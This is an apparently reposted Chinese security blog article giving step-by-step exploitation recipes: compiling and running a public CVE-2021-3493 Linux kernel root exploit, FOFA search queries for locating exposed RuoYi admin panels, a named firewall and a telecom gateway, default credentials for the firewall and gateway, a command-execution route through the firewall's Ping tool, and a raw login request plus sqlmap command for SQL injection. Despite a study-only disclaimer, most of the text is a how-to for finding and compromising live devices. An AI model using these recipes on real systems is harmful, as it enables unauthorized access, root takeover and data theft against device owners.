Linux kernel权限提升漏洞 CVE-2021-3493

admin 2022年5月24日09:33:34评论170 views字数 1640阅读5分28秒阅读模式

 那些比你走得远的人,并不一定比你聪慧,只是每天多走了一点。世上所谓的“奇迹”,不过是坚持、努力的代名词!


导读

 

本文章仅用于交流学习,请勿使用该方法进行违法活动,谢谢!(公众号复现过程略显简单,有需要复现文档的直接去公众号回复“MoBei”


复现索引(不要管标题名字~~)


Linux kernel权限提升漏洞 CVE-2021-3493


Linux kernel权限提升漏洞 CVE-2021-3493


1)环境搭建(虚拟机下载地址如下)

http://mirrors.ustc.edu.cn/ubuntu-releases/18.04/ubuntu-18.04.5-desktop-amd64.iso

Linux kernel权限提升漏洞 CVE-2021-3493

2)准备工作,将EXP上传到靶机,exp下载地址如下

https://github.com/briskets/CVE-2021-3493

Linux kernel权限提升漏洞 CVE-2021-3493

3)执行如下命令,编译脚本并执行~

gcc exploit.c -o exploitchmod +x exploit./exploit

4)运行EXP成功提权(直接就ROOT了)

Linux kernel权限提升漏洞 CVE-2021-3493

5)环境搭建复现的过程中出现了两个小问题的解决办法分享~

a、安装好ubuntu后,可以直接sudo passwd root修改root密码b、ssh连接显示SSH服务器拒绝了密码,请再试一次。如果修改配置文件和防火墙添加规则还不行,把用户名大写字母都改为小写的即可。


若依管理系统未授权访问


1)FOFA语句

 app="若依-管理系统"

Linux kernel权限提升漏洞 CVE-2021-3493

2)登录界面

Linux kernel权限提升漏洞 CVE-2021-3493

3)POC

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

Linux kernel权限提升漏洞 CVE-2021-3493

佑友防火墙后台命令执行漏洞


1)FOFA语句

title="佑友防火墙"

Linux kernel权限提升漏洞 CVE-2021-3493

2)登录界面

Linux kernel权限提升漏洞 CVE-2021-3493

3)默认账户密码(登录截图就省略了,你们懂的~~)

User: adminPass: hicomadmin

4)登录后台--系统管理 --维护工具 --Ping命令

Linux kernel权限提升漏洞 CVE-2021-3493

5)命令执行

Linux kernel权限提升漏洞 CVE-2021-3493


电信网关配置管理系统 前台登陆页面用户名参数存在SQL注入漏洞


1)FOFA语句

body="src="img/dl.gif"" && title="系统登录"

Linux kernel权限提升漏洞 CVE-2021-3493

2)登录界面

Linux kernel权限提升漏洞 CVE-2021-3493

3)设备默认弱口令 

**admin/admin**

4)登录请求包

POST /manager/login.php HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 53Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Cookie: PHPSESSID=2lfi6enp5gehalrb92594c80i6Connection: close
Name=admin&Pass=admin

5)保存为文件使用 Sqlmap工具,注入点为 **Name参数**

sqlmap -r sql-1.txt -p Name --risk 3


- - - - - - - - - - - - - - - END - - - - - - - - - - ----------


点关注,不迷路


觉得不错的帮忙点个“赞”,“在看” ~~~


原文始发于微信公众号(五六七安全团队):Linux kernel权限提升漏洞 CVE-2021-3493

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月24日09:33:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Linux kernel权限提升漏洞 CVE-2021-3493https://cn-sec.com/archives/1030831.html

发表评论

匿名网友 填写信息